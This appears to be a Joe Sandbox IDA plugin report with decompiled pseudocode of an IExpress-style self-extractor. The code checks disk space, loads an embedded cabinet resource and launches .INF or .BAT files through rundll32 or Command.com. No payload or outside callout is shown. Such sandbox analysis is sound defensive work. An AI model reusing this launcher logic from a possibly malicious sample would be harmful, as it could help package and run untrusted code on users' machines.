                                                                                                                                                                                                    					_t135 = "\"";
                                                                                                                                                                                                    					_t53 =  &_v527;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t111 =  &_v1556;
                                                                                                                                                                                                    				_v1556 = _t53;
                                                                                                                                                                                                    				_t54 = E00171A84(_t111, _t135);
                                                                                                                                                                                                    				_t156 = _v1556;
                                                                                                                                                                                                    				_t151 = _t54;
                                                                                                                                                                                                    				if(_t156 == 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					_push(_t111);
                                                                                                                                                                                                    					E00171781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                    					E0017658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t132 = _t156;
                                                                                                                                                                                                    					_t148 =  &(_t132[1]);
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t105 =  *_t132;
                                                                                                                                                                                                    						_t132 =  &(_t132[1]);
                                                                                                                                                                                                    					} while (_t105 != 0);
                                                                                                                                                                                                    					_t111 = _t132 - _t148;
                                                                                                                                                                                                    					if(_t111 < 3) {
                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t106 = _t156[1];
                                                                                                                                                                                                    					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                    						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                    							goto L12;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							goto L11;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                    						E00171680( &_v268, 0x104, _t156);
                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                    						_t138 = 0x2e;
                                                                                                                                                                                                    						_t57 = E001766C8(_t156, _t138);
                                                                                                                                                                                                    						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                    							_t139 = 0x2e;
                                                                                                                                                                                                    							_t115 = _t156;
                                                                                                                                                                                                    							_t58 = E001766C8(_t115, _t139);
                                                                                                                                                                                                    							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                    								if(_t156 == 0) {
                                                                                                                                                                                                    									goto L43;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                    								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                    									E00171680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_push(_t115);
                                                                                                                                                                                                    									_t108 = 0x400;
                                                                                                                                                                                                    									E00171781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                    									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                    										E001716B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                    										E001716B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t140 = _t156;
                                                                                                                                                                                                    								 *_t156 = 0;
                                                                                                                                                                                                    								E00172AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                    								goto L53;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t108 = "Command.com /c %s";
                                                                                                                                                                                                    								_t125 = "Command.com /c %s";
                                                                                                                                                                                                    								_t145 = _t125 + 1;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t76 =  *_t125;
                                                                                                                                                                                                    									_t125 = _t125 + 1;
                                                                                                                                                                                                    								} while (_t76 != 0);
                                                                                                                                                                                                    								_t126 = _t125 - _t145;
                                                                                                                                                                                                    								_t146 =  &_v268;
                                                                                                                                                                                                    								_t157 = _t146 + 1;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t77 =  *_t146;
                                                                                                                                                                                                    									_t146 = _t146 + 1;
                                                                                                                                                                                                    								} while (_t77 != 0);
                                                                                                                                                                                                    								_t140 = _t146 - _t157;
                                                                                                                                                                                                    								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                    								if(_t156 != 0) {
                                                                                                                                                                                                    									E0017171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                    									goto L53;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L43;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                    								_t140 = 0x525;
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_t60 =  &_v268;
                                                                                                                                                                                                    								goto L35;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t140 = "[";
                                                                                                                                                                                                    								_v1556 = _t151;
                                                                                                                                                                                                    								_t90 = E00171A84( &_v1556, "[");
                                                                                                                                                                                                    								if(_t90 != 0) {
                                                                                                                                                                                                    									if( *_t90 != 0) {
                                                                                                                                                                                                    										_v1556 = _t90;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t140 = "]";
                                                                                                                                                                                                    									E00171A84( &_v1556, "]");
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                    								if(_t156 == 0) {
                                                                                                                                                                                                    									L43:
                                                                                                                                                                                                    									_t60 = 0;
                                                                                                                                                                                                    									_t140 = 0x4b5;
						_push(0);
						_push(0x10);
						_push(0);
						L35:
						_push(_t60);
						E001744B9(0, _t140);
						_t62 = 0;
						goto L54;
					} else {
						_t155 = _v1556;
						_t92 = _t155;
						if( *_t155 == 0) {
							_t92 = "DefaultInstall";
						}
						 *0x179120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
						 *_v1560 = 1;
						if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x171140, _t156, 8,  &_v268) == 0) {
							 *0x179a34 =  *0x179a34 & 0xfffffffb;
							if( *0x179a40 != 0) {
								_t108 = "setupapi.dll";
							} else {
								_t108 = "setupx.dll";
								GetShortPathNameA( &_v268,  &_v268, 0x104);
							}
							if( *_t155 == 0) {
								_t155 = "DefaultInstall";
							}
							_push( &_v268);
							_push(_t155);
							E0017171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
						} else {
							 *0x179a34 =  *0x179a34 | 0x00000004;
							if( *_t155 == 0) {
								_t155 = "DefaultInstall";
							}
							E00171680(_t108, 0x104, _t155);
							_t140 = 0x200;
							E00171680(_t156, 0x200,  &_v268);
						}
						L53:
						_t62 = 1;
						 *_v1564 = _t156;
						L54:
						_pop(_t152);
						return E00176CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
					}
				}
			}
		}
	}
}
0x00171af3
0x00171afa
0x00171b07
0x00171b09
0x00171b1a
0x00171b20
0x00171b2c
0x00171b3b
0x00171b40
0x00171b2e
0x00171b2e
0x00171b33
0x00171b33
0x00171b46
0x00171b4c
0x00171b52
0x00171b57
0x00171b5d
0x00171b61
0x00171b9f
0x00171b9f
0x00171bb1
0x00171bc2
0x00000000
0x00171b63
0x00171b63
0x00171b65
0x00171b68
0x00171b68
0x00171b6a
0x00171b6b
0x00171b6f
0x00171b74
0x00000000
0x00000000
0x00171b76
0x00171b7b
0x00171b86
0x00000000
0x00000000
0x00000000
0x00000000
0x00171b8c
0x00171b8c
0x00171b98
0x00171bc7
0x00171bc9
0x00171bcc
0x00171bd3
0x00171d75
0x00171d76
0x00171d78
0x00171d7f
0x00171e05
0x00171e09
0x00000000
0x00000000
0x00171e12
0x00171e1b
0x00171e73
0x00171e21
0x00171e21
0x00171e28
0x00171e37
0x00171e3e
0x00171e52
0x00171e60
0x00171e60
0x00171e3e
0x00171e79
0x00171e7b
0x00171e84
0x00000000
0x00171d9b
0x00171d9b
0x00171da0
0x00171da2
0x00171da5
0x00171da5
0x00171da7
0x00171da8
0x00171dac
0x00171dae
0x00171db4
0x00171db7
0x00171db7
0x00171db9
0x00171dba
0x00171dbe
0x00171dc3
0x00171dce
0x00171dd2
0x00171deb
0x00000000
0x00171df0
0x00000000
0x00171dd2
0x00171bf7
0x00171bfe
0x00171c07
0x00171d55
0x00171d5a
0x00171d5b
0x00171d5d
0x00171d5e
0x00000000
0x00171c1b
0x00171c1b
0x00171c20
0x00171c2c
0x00171c33
0x00171c38
0x00171c3a
0x00171c3a
0x00171c40
0x00171c4b
0x00171c4b
0x00171c5d
0x00171c61
0x00171dd4
                                                                                                                                                                                                    0x00171dd4
                                                                                                                                                                                                    0x00171dd6
                                                                                                                                                                                                    0x00171ddb
                                                                                                                                                                                                    0x00171ddc
                                                                                                                                                                                                    0x00171dde
                                                                                                                                                                                                    0x00171d64
                                                                                                                                                                                                    0x00171d64
                                                                                                                                                                                                    0x00171d67
                                                                                                                                                                                                    0x00171d6c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00171c67
                                                                                                                                                                                                    0x00171c67
                                                                                                                                                                                                    0x00171c6d
                                                                                                                                                                                                    0x00171c72
                                                                                                                                                                                                    0x00171c74
                                                                                                                                                                                                    0x00171c74
                                                                                                                                                                                                    0x00171c8e
                                                                                                                                                                                                    0x00171c99
                                                                                                                                                                                                    0x00171cc0
                                                                                                                                                                                                    0x00171cf8
                                                                                                                                                                                                    0x00171d07
                                                                                                                                                                                                    0x00171d23
                                                                                                                                                                                                    0x00171d09
                                                                                                                                                                                                    0x00171d14
                                                                                                                                                                                                    0x00171d1b
                                                                                                                                                                                                    0x00171d1b
                                                                                                                                                                                                    0x00171d2b
                                                                                                                                                                                                    0x00171d2d
                                                                                                                                                                                                    0x00171d2d
                                                                                                                                                                                                    0x00171d38
                                                                                                                                                                                                    0x00171d39
                                                                                                                                                                                                    0x00171d46
                                                                                                                                                                                                    0x00171cc2
                                                                                                                                                                                                    0x00171cc2
                                                                                                                                                                                                    0x00171ccc
                                                                                                                                                                                                    0x00171cce
                                                                                                                                                                                                    0x00171cce
                                                                                                                                                                                                    0x00171cdb
                                                                                                                                                                                                    0x00171ce6
                                                                                                                                                                                                    0x00171cee
                                                                                                                                                                                                    0x00171cee
                                                                                                                                                                                                    0x00171e89
                                                                                                                                                                                                    0x00171e91
                                                                                                                                                                                                    0x00171e92
                                                                                                                                                                                                    0x00171e94
                                                                                                                                                                                                    0x00171e97
                                                                                                                                                                                                    0x00171ea4
                                                                                                                                                                                                    0x00171ea4
                                                                                                                                                                                                    0x00171c61
                                                                                                                                                                                                    0x00171c07
                                                                                                                                                                                                    0x00171bd3
                                                                                                                                                                                                    0x00171b7b

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00171BE7
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00171BFE
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00171C57
                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00171C88
                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00171140,00000000,00000008,?), ref: 00171CB8
                                                                                                                                                                                                    • GetShortPathNameA.KERNEL32 ref: 00171D1B
                                                                                                                                                                                                      • Part of subcall function 001744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00174518
                                                                                                                                                                                                      • Part of subcall function 001744B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00174554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                    • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                    • API String ID: 383838535-3368923722
                                                                                                                                                                                                    • Opcode ID: e033e72d7ed25f9532cdd00a6aa75a67ba4c1ae6b41aca50937f1ac8d912b471
                                                                                                                                                                                                    • Instruction ID: 6be101b0f330fa53b04e25db4a189476ce2094780318694d7db7bf901e3040cf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e033e72d7ed25f9532cdd00a6aa75a67ba4c1ae6b41aca50937f1ac8d912b471
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96A13870A402147BEB309B2CCC49BEA7779AB95310F54C2A5F95DA72C0DBB09EC5CB50
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 324 17597d-1759b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 1759dd-175a1b GetDiskFreeSpaceA 324->325 326 1759bb-1759d8 call 1744b9 call 176285 324->326 327 175ba1-175bde memset call 176285 GetLastError FormatMessageA 325->327 328 175a21-175a4a MulDiv 325->328 345 175c05-175c14 call 176ce0 326->345 337 175be3-175bfc call 1744b9 SetCurrentDirectoryA 327->337 328->327 331 175a50-175a6c GetVolumeInformationA 328->331 334 175ab5-175aca SetCurrentDirectoryA 331->334 335 175a6e-175ab0 memset call 176285 GetLastError FormatMessageA 331->335 339 175acc-175ad1 334->339 335->337 351 175c02 337->351 343 175ad3-175ad8 339->343 344 175ae2-175ae4 339->344 343->344 347 175ada-175ae0 343->347 349 175ae7-175af8 344->349 350 175ae6 344->350 347->339 347->344 353 175af9-175afb 349->353 350->349 354 175c04 351->354 355 175b05-175b08 353->355 356 175afd-175b03 353->356 354->345 357 175b20-175b27 355->357 358 175b0a-175b1b call 1744b9 355->358 356->353 356->355 360 175b52-175b5b 357->360 361 175b29-175b33 357->361 358->351 364 175b62-175b6d 360->364 361->360 363 175b35-175b50 361->363 363->364 365 175b76-175b7d 364->365 366 175b6f-175b74 364->366 368 175b83 365->368 369 175b7f-175b81 365->369 367 175b85 366->367 370 175b87-175b94 call 17268b 367->370 371 175b96-175b9f 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                    			E0017597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                    				char _v788;
                                                                                                                                                                                                    				long _v792;
                                                                                                                                                                                                    				long _v796;
                                                                                                                                                                                                    				long _v800;
                                                                                                                                                                                                    				signed int _v804;
                                                                                                                                                                                                    				long _v808;
                                                                                                                                                                                                    				int _v812;
                                                                                                                                                                                                    				long _v816;
                                                                                                                                                                                                    				long _v820;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                    				signed int _t55;
                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                    				int _t69;
                                                                                                                                                                                                    				signed int _t73;
                                                                                                                                                                                                    				signed short _t78;
                                                                                                                                                                                                    				signed int _t87;
                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                    				int _t102;
                                                                                                                                                                                                    				unsigned int _t103;
                                                                                                                                                                                                    				unsigned int _t105;
                                                                                                                                                                                                    				signed int _t111;
                                                                                                                                                                                                    				long _t112;
                                                                                                                                                                                                    				signed int _t116;
                                                                                                                                                                                                    				CHAR* _t118;
                                                                                                                                                                                                    				signed int _t119;
	signed int _t120;

	_t114 = __edi;
	_t46 =  *0x178004; // 0x4ffa21aa
	_v8 = _t46 ^ _t120;
	_v804 = __edx;
	_t118 = __ecx;
	GetCurrentDirectoryA(0x104,  &_v276);
	_t50 = SetCurrentDirectoryA(_t118); // executed
	if(_t50 != 0) {
		_push(__edi);
		_v796 = 0;
		_v792 = 0;
		_v800 = 0;
		_v808 = 0;
		_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
		__eflags = _t55;
		if(_t55 == 0) {
			L29:
			memset( &_v788, 0, 0x200);
			 *0x179124 = E00176285();
			FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
			_t110 = 0x4b0;
			L30:
			__eflags = 0;
			E001744B9(0, _t110, _t118,  &_v788, 0x10, 0);
			SetCurrentDirectoryA( &_v276);
			L31:
			_t66 = 0;
			__eflags = 0;
			L32:
			_pop(_t114);
			goto L33;
		}
		_t69 = _v792 * _v796;
		_v812 = _t69;
		_t116 = MulDiv(_t69, _v800, 0x400);
		__eflags = _t116;
		if(_t116 == 0) {
			goto L29;
		}
		_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
		__eflags = _t73;
		if(_t73 != 0) {
			SetCurrentDirectoryA( &_v276); // executed
			_t101 =  &_v16;
			_t111 = 6;
			_t119 = _t118 - _t101;
			__eflags = _t119;
			while(1) {
				_t22 = _t111 - 4; // 0x2
				__eflags = _t22;
				if(_t22 == 0) {
					break;
				}
				_t87 =  *((intOrPtr*)(_t119 + _t101));
				__eflags = _t87;
				if(_t87 == 0) {
					break;
				}
				 *_t101 = _t87;
				_t101 = _t101 + 1;
				_t111 = _t111 - 1;
				__eflags = _t111;
				if(_t111 != 0) {
					continue;
				}
				break;
			}
			__eflags = _t111;
			if(_t111 == 0) {
				_t101 = _t101 - 1;
				__eflags = _t101;
			}
			 *_t101 = 0;
			_t112 = 0x200;
			_t102 = _v812;
			_t78 = 0;
			_t118 = 8;
			while(1) {
				__eflags = _t102 - _t112;
				if(_t102 == _t112) {
					break;
				}
				_t112 = _t112 + _t112;
				_t78 = _t78 + 1;
				__eflags = _t78 - _t118;
				if(_t78 < _t118) {
					continue;
				}
				break;
			}
			__eflags = _t78 - _t118;
			if(_t78 != _t118) {
				__eflags =  *0x179a34 & 0x00000008;
				if(( *0x179a34 & 0x00000008) == 0) {
					L20:
					_t103 =  *0x179a38; // 0x0
					_t110 =  *((intOrPtr*)(0x1789e0 + (_t78 & 0x0000ffff) * 4));
					L21:
					__eflags = (_v804 & 0x00000003) - 3;
					if((_v804 & 0x00000003) != 3) {
						__eflags = _v804 & 0x00000001;
						if((_v804 & 0x00000001) == 0) {
							__eflags = _t103 - _t116;
						} else {
							__eflags = _t110 - _t116;
						}
					} else {
						__eflags = _t103 + _t110 - _t116;
					}
					if(__eflags <= 0) {
						 *0x179124 = 0;
						_t66 = 1;
					} else {
						_t66 = E0017268B(_a4, _t110, _t103,  &_v16);
					}
					goto L32;
				}
				__eflags = _v816 & 0x00008000;
				if((_v816 & 0x00008000) == 0) {
					goto L20;
				}
				_t105 =  *0x179a38; // 0x0
				_t110 =  *((intOrPtr*)(0x1789e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x1789e0 + (_t78 & 0x0000ffff) * 4));
				_t103 = (_t105 >> 2) +  *0x179a38;
				goto L21;
			}
			_t110 = 0x4c5;
			E001744B9(0, 0x4c5, 0, 0, 0x10, 0);
			goto L31;
		}
		memset( &_v788, 0, 0x200);
		 *0x179124 = E00176285();
		FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
		_t110 = 0x4f9;
		goto L30;
	} else {
		_t110 = 0x4bc;
		E001744B9(0, 0x4bc, 0, 0, 0x10, 0);
		 *0x179124 = E00176285();
		_t66 = 0;
		L33:
		return E00176CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
	}
}
0x0017597d
0x00175988
0x0017598f
0x0017599a
0x001759a6
0x001759a8
0x001759af
0x001759b9
0x001759dd
0x001759e4
0x001759f1
0x001759fe
0x00175a0b
0x00175a13
0x00175a19
0x00175a1b
0x00175ba1
0x00175baf
0x00175bbd
                                                                                                                                                                                                    0x00175bd8
                                                                                                                                                                                                    0x00175bde
                                                                                                                                                                                                    0x00175be3
                                                                                                                                                                                                    0x00175bec
                                                                                                                                                                                                    0x00175bf0
                                                                                                                                                                                                    0x00175bfc
                                                                                                                                                                                                    0x00175c02
                                                                                                                                                                                                    0x00175c02
                                                                                                                                                                                                    0x00175c02
                                                                                                                                                                                                    0x00175c04
                                                                                                                                                                                                    0x00175c04
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175c04
                                                                                                                                                                                                    0x00175a27
                                                                                                                                                                                                    0x00175a3a
                                                                                                                                                                                                    0x00175a46
                                                                                                                                                                                                    0x00175a48
                                                                                                                                                                                                    0x00175a4a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175a64
                                                                                                                                                                                                    0x00175a6a
                                                                                                                                                                                                    0x00175a6c
                                                                                                                                                                                                    0x00175abc
                                                                                                                                                                                                    0x00175ac2
                                                                                                                                                                                                    0x00175ac9
                                                                                                                                                                                                    0x00175aca
                                                                                                                                                                                                    0x00175aca
                                                                                                                                                                                                    0x00175acc
                                                                                                                                                                                                    0x00175acc
                                                                                                                                                                                                    0x00175acf
                                                                                                                                                                                                    0x00175ad1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175ad3
                                                                                                                                                                                                    0x00175ad6
                                                                                                                                                                                                    0x00175ad8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175ada
                                                                                                                                                                                                    0x00175adc
                                                                                                                                                                                                    0x00175add
                                                                                                                                                                                                    0x00175add
                                                                                                                                                                                                    0x00175ae0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175ae0
                                                                                                                                                                                                    0x00175ae2
                                                                                                                                                                                                    0x00175ae4
                                                                                                                                                                                                    0x00175ae6
                                                                                                                                                                                                    0x00175ae6
                                                                                                                                                                                                    0x00175ae6
                                                                                                                                                                                                    0x00175ae9
                                                                                                                                                                                                    0x00175aeb
                                                                                                                                                                                                    0x00175af0
                                                                                                                                                                                                    0x00175af6
                                                                                                                                                                                                    0x00175af8
                                                                                                                                                                                                    0x00175af9
                                                                                                                                                                                                    0x00175af9
                                                                                                                                                                                                    0x00175afb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175afd
                                                                                                                                                                                                    0x00175aff
                                                                                                                                                                                                    0x00175b00
                                                                                                                                                                                                    0x00175b03
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175b03
                                                                                                                                                                                                    0x00175b05
                                                                                                                                                                                                    0x00175b08
                                                                                                                                                                                                    0x00175b20
                                                                                                                                                                                                    0x00175b27
                                                                                                                                                                                                    0x00175b52
                                                                                                                                                                                                    0x00175b52
                                                                                                                                                                                                    0x00175b5b
                                                                                                                                                                                                    0x00175b62
                                                                                                                                                                                                    0x00175b6b
                                                                                                                                                                                                    0x00175b6d
                                                                                                                                                                                                    0x00175b76
                                                                                                                                                                                                    0x00175b7d
                                                                                                                                                                                                    0x00175b83
                                                                                                                                                                                                    0x00175b7f
                                                                                                                                                                                                    0x00175b7f
                                                                                                                                                                                                    0x00175b7f
                                                                                                                                                                                                    0x00175b6f
                                                                                                                                                                                                    0x00175b72
                                                                                                                                                                                                    0x00175b72
                                                                                                                                                                                                    0x00175b85
                                                                                                                                                                                                    0x00175b98
                                                                                                                                                                                                    0x00175b9e
                                                                                                                                                                                                    0x00175b87
                                                                                                                                                                                                    0x00175b8f
                                                                                                                                                                                                    0x00175b8f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175b85
                                                                                                                                                                                                    0x00175b29
                                                                                                                                                                                                    0x00175b33
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175b35
                                                                                                                                                                                                    0x00175b48
                                                                                                                                                                                                    0x00175b4a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175b4a
                                                                                                                                                                                                    0x00175b0f
                                                                                                                                                                                                    0x00175b16
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175b16
                                                                                                                                                                                                    0x00175a7c
                                                                                                                                                                                                    0x00175a8a
                                                                                                                                                                                                    0x00175aa5
                                                                                                                                                                                                    0x00175aab
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001759bb
                                                                                                                                                                                                    0x001759c0
                                                                                                                                                                                                    0x001759c7
                                                                                                                                                                                                    0x001759d1
                                                                                                                                                                                                    0x001759d6
                                                                                                                                                                                                    0x00175c05
                                                                                                                                                                                                    0x00175c14
                                                                                                                                                                                                    0x00175c14

APIs
• GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001759A8
• SetCurrentDirectoryA.KERNELBASE(?), ref: 001759AF
• GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00175A13
• MulDiv.KERNEL32(?,?,00000400), ref: 00175A40
• GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00175A64
• memset.MSVCRT ref: 00175A7C
• GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00175A98
• FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00175AA5
• SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00175BFC
  • Part of subcall function 001744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00174518
  • Part of subcall function 001744B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00174554
  • Part of subcall function 00176285: GetLastError.KERNEL32(00175BBC), ref: 00176285
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4237285672-0
                                                                                                                                                                                                    • Opcode ID: ec1e5ada2c64fc5e194f5e9221d43e6f955df278550eb36e6aeb676dca05d8e0
                                                                                                                                                                                                    • Instruction ID: 696b6f8c4cf5644687020ae40d6c7ce17e4d9bfa53b34f48d6230ad134b903e1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec1e5ada2c64fc5e194f5e9221d43e6f955df278550eb36e6aeb676dca05d8e0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B97192B190060CAFEB159B60CC85BFA77BEEB88344F5484A9F50DD7540DB709EC58B60
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[control-flow graph image not reproduced; legend: Executed / Not Executed]
C-Code - Quality: 77%
E00174FE0(void* __edi, void* __eflags) {
    void* __ebx;
    void* _t8;
    struct HWND__* _t9;
    int _t10;
    void* _t12;
    struct HWND__* _t24;
    struct HWND__* _t27;
    intOrPtr _t29;
    void* _t33;
    int _t34;
    CHAR* _t36;
    int _t37;
    intOrPtr _t47;

    _t33 = __edi;
    _t36 = "CABINET"; // name of the resource holding the embedded cabinet archive
    *0x179144 = E0017468F(_t36, 0, 0);
    _t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
    *0x179140 = _t8;
    if(_t8 == 0) {
        return _t8;
    }
